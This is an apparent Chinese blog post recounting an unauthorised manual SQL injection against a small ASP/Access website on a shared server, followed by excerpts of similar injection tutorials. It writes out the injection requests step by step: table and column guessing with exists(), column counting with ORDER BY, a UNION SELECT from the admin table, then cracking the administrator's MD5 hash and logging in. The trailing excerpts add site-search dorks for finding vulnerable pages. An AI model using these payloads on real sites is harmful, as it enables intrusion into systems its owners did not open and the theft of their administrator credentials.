asp Access手工注入案例

2021-06-18 21:23:55 字數 3000 閱讀 7608

呵呵,當時聽那朋友說的,他們好多人都不行,拿不下,我被嚇到了,呵呵,想著別人那麼多人都拿不下的站,我乙個小菜鳥能拿下?

但是,開啟之後發現頁面跳轉到了

看來是直接cookie驗證了,算了,這麼複雜,直接放棄了從主站直接下手的想法,看看能不能旁註吧,於是,開啟

查詢一下,不查不知道,一查我就高興了,哈哈:

這個伺服器上放了200多個**,這麼多**能全部做到安全麼?顯然,在國內來說,那是不可能的,所以,我的勝算增加了一分。

既然這麼多**,那就乙個乙個來吧,唉,像我這種菜鳥級的人物,只好幹這種體力活了… …

在這裡,我偷了懶,開啟明小子,批量掃瞄後台,這是我的一點個人習慣,在辦正事之前我習慣先找後台,嗯,雖然我是聯通,而這伺服器是電信,但速度還蠻快的,很快結果出來了,於是乙個後台乙個後台的試,結果不是過濾注入就是網域名稱失效,弱口令更是乙個沒有,繼續,繼續,繼續。

一直到這個**:

後台是:

/admin/login.asp

先看有沒有弱口令,發現沒有,於是只好去前台轉,開啟前台後,是英文,全是英文,我原本打算找個轉換按鈕的,但是發現頁面上沒有,算了,沒有就沒有吧,將就著來吧。

/productshow.asp?id=711

加單引號,出錯了:

我懶,懶得手工來,並且對於asp,我也實在沒有手工來的興趣,工具那麼好用,何必不用工具呢?

於是,拉出我一直信任有加的啊d,把注入點放進去,開始檢測:

結果啊d告訴我不能注入,咦?怎麼會這樣呢?

既然啊d不行,那就換明小子:

鬱悶了,明小子也告訴我不能注入,那,難道是我的手工判斷錯誤?還是這種注入型別工具無法檢測?

提交:/productshow.asp?id=711 andexists (select * from admin)

頁面回顯正常:

說明存在admin表,再提交:

/productshow.asp?id=711 andexists (select username from admin)

頁面回顯正常,說明存在username欄位,再提交:

/productshow.asp?id=711 andexists (select password from admin)

頁面回顯正常,說明存在password欄位,現在表名和欄位名全部猜完,該爆使用者名稱和密碼了,於是,先order by,提交:

/productshow.asp?id=711 orderby 5

頁面回顯錯誤,說明頁面中的字段數不是5,依次反覆提交,直到提交:

/productshow.asp?id=711 orderby 36

這時頁面回顯正常,說明欄位數為36,於是,開始union select,提交:

/productshow.asp?id=711 and1=2 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36

頁面回顯錯誤,為什麼會出錯呢?

當時我的理解有2點,一,是需要用null替代了,二,是需要加from了,我懶,懶得寫36個null,於是,先試試加from吧,提交:

/productshow.asp?id=711 and1=2 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36from admin

頁面回顯正常,成功出現顯示位:

ok,既然顯示位出來了,那就開始爆使用者名稱和密碼吧,提交:

哦了,管理員的使用者名稱和密碼都爆出來了,把md5複製下來,去解密:

ok,結果出來了,密碼是better,開啟後台,登入:

ok,登入成功。

下邊的,俺這小菜鳥就不寫拉,這篇文章只是**一下union select的時候是否要加from,以及在什麼情況下要加from,我試了試這個站的資料庫,發現好像不是mssql,應該是access的,而在php+mysql的聯合查詢中,就不必在最後加上from,那麼是否就是說,在access環境下,就必須要加上from呢?望明人指點,謝謝。

文章很戳,沒什麼技術含量,不要噴我不要噴我……

手工注入 MySQL手工注入實戰和分析

通過 和構造 and 1 1 和 and 1 2 檢視頁面是否報錯。這裡通過and 1 1 發現頁面正常。如下圖。接下來,咱們再構造 and 1 2 發現頁面報錯,說明頁面存在注入點。如下圖。通過 order by 語句,如果後面輸入的數字大於資料庫的字段數,頁面就會報錯,通過這個,咱們先輸入 or...

PHP手工注入

後台 查詢版本 資料庫名 查詢表 ytw 轉換成16等於 0x797477 查詢列 查詢賬號密碼 0x5c 代表不用去換算16進製制,如果不填就去轉換下 wwwrree da1864898daff10a7a936233d013cbb1,admin fb56fe7ffc84a325b7e4889174...

SQL手工注入

site xx.cn inurl asp?id 找文章 xx.cn pth onews.asp?id 243 試注入 xx.cn pth onews.asp?id 243 order by 10 xx.cn pth onews.asp?id 243 order by 20 order by 語句用於...